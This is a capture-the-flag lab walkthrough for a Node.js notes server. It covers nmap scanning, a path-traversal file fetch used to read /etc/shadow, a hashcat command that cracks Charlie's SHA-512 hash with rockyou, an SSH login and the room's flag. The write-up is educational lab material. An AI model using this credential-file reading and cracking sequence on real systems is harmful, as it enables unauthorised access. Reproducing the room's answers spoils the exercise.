Elf Charlie likes to make notes and store them on his server. Are you able to take advantage of this functionality and crack his password?
Read the supporting materials here.
Setup
1kali@kali:~$ nmap -A -vv 10.10.45.154
122/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)2| ssh-hostkey:3| 2048 27:97:56:c6:7d:87:00:2d:a3:9c:90:60:9c:17:ae:8d (RSA)4| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpcxSjvRT07NjHQOXap9xTO5mWnscMVSvlwVNNn3FT9phbKzzsD3ZXnIYcUHTIak8wKlGnSBmgjlVCgbzebvZDprNrjFDzQZZ+GX2ZJ+GtsPTZIbf3ynYVPfeLBdfuYYnkwf4U2o4em4CRSGzd+MUuLGNYMcKOC9h0g7kU4NybDVwgT6W9KDNeBqzd1oOnSj26hvYTO2N+6vIfwyIFrzASBp/1Sjy830vQdobpzL9r4Cb7sG8cBx1qw5iy6ImZXrRFt33+hNFCcMDr0XUMcw+6xvoEfWDAZoEqCRUaRKtDEcGnENW3NPG/YMhqXNoYq6qLzLIUnwzj3n2wEV/JCULj5| 256 3b:4c:29:10:da:0b:17:6c:ba:de:d0:66:66:20:c5:df (ECDSA)6| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGzgpJOUVURY/Wfz66y/OR17GgMyN05IcMVmVO2wE560O/KwqqX0qmlIZ60fjqpTd8dXXD2oYY4mUju4kh1hYTk=7| 256 15:70:d4:d5:aa:b6:4f:98:7f:2d:90:d8:b7:74:88:a6 (ED25519)8|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB5uDVGTfyLrVZrQzYS+YZJBtTBRFNLwueR4k+/DYdjp91080/tcp open http syn-ack Node.js (Express middleware)11|_http-favicon: Unknown favicon MD5: DBC69DB56435575CDC5CF45C9604595812| http-methods:13|_ Supported Methods: GET HEAD POST OPTIONS14|_http-title: Public Notes15Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
#1 What is Charlie going to book a holiday to?
1Hawaii
#2 Read /etc/shadow and crack Charlies password.
If we check the source code of the webpage
1<script>2 function getNote(note, id) {3 const url = '/get-file/' + note.replace(/\//g, '%2f')4 $.getJSON(url, function(data) {5 document.querySelector(id).innerHTML = data.info.replace(/(?:\r\n|\r|\n)/g, '<br>');6 })7 }8 // getNote('server.js', '#note-1')9 getNote('views/notes/note1.txt', '#note-1')10 getNote('views/notes/note2.txt', '#note-2')11 getNote('views/notes/note3.txt', '#note-3')12 </script>
Now let’s fire up burp suite and make some LFI :D
Now that we have charlie’s password hash let’s crack it !
1# Hash to decode2$6$oHymLspP$wTqsTmpPkz.u/CQDbheQjwwjyYoVN2rOm6CDu0KDeq8mN4pqzuna7OX.LPdDPCkPj7O9TB0rvWfCzpEkGOyhL.
1sudo hashcat -m 1800 -a 0 --force -o crack.txt hash.txt /usr/share/wordlists/rockyou.txt
1kali@kali:~$ sudo cat crack.txt2"password1"
#3 What is flag1.txt?
Let’s access the machine now with charlie’s password
1kali@kali:~$ ssh charlie@10.10.45.15423The authenticity of host 10.10.45.154 (10.10.45.154) cant be established.4ECDSA key fingerprint is SHA256:FTprTqjO/Yb1cVxlvn/P9VvlOeZMFbs4eQwOOTUqhg4.5Are you sure you want to continue connecting (yes/no/[fingerprint])? yes6Warning: Permanently added '10.10.45.154' (ECDSA) to the list of known hosts.78charlie@10.10.45.154 password: "password1"9Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-1092-aws x86_64)1011 * Documentation: https://help.ubuntu.com12 * Management: https://landscape.canonical.com13 * Support: https://ubuntu.com/advantage141565 packages can be updated.1632 updates are security updates.1718Last login: Fri Dec 13 21:44:29 2019 from 10.8.11.981920charlie@ip-10-10-45-154:~$
1charlie@ip-10-10-45-154:~$ ls2flag1.txt3charlie@ip-10-10-45-154:~$ cat flag1.txt4'THM{4ea2adf842713ad3ce0c1f05ef12256d}'
